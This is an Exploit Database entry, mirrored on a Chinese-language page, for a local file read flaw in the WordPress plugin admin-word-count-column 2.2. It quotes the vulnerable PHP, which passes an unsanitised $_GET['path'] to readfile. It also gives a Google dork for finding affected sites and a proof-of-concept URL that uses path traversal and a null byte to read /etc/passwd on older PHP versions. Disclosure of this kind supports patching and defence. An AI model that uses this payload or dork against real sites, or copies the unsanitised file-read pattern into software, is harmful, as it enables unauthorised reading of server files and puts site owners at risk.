WordPress Plugin admin-word-count-column 2.2 – Local File Read

• Exploit Database
• 105 阅读

• 作者： Hassan Khan Yusufzai
  日期： 2022-03-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50845/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30

  # Exploit Title: WordPress Plugin admin-word-count-column 2.2 - Local File Read # Google Dork: inurl:/wp-content/plugins/admin-word-count-column/ # Date: 27-03-2022 # Exploit Author: Hassan Khan Yusufzai - Splint3r7 # Vendor Homepage: https://wordpress.org/plugins/admin-word-count-column/ # Version: 2.2 # Contact me: h [at] spidersilk.com   # PHP version: 5.3.2 or below   # Vulnerable File: plugins/admin-word-count-column/download-csv.php   # Vulnerable Code: </code><code> <?php date_default_timezone_set(&apos;America/Los_Angeles&apos;); $csvdate = date(&apos;Md-H-i-s-T&apos;); $csvname = &apos;wordcounts-&apos; . $csvdate . &apos;.csv&apos;; header(&apos;Content-Type: application/csv&apos;); header(&apos;Content-Disposition: attachment; filename=&apos; . $csvname); header(&apos;Pragma: no-cache&apos;); readfile($_GET[&apos;path&apos;] . &apos;cpwc.csv&apos;); ?> </code><code> # Proof of Concept:   localhost/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0   Note: Null byte injection will only working in php 5.3.2 and below 5.3.2.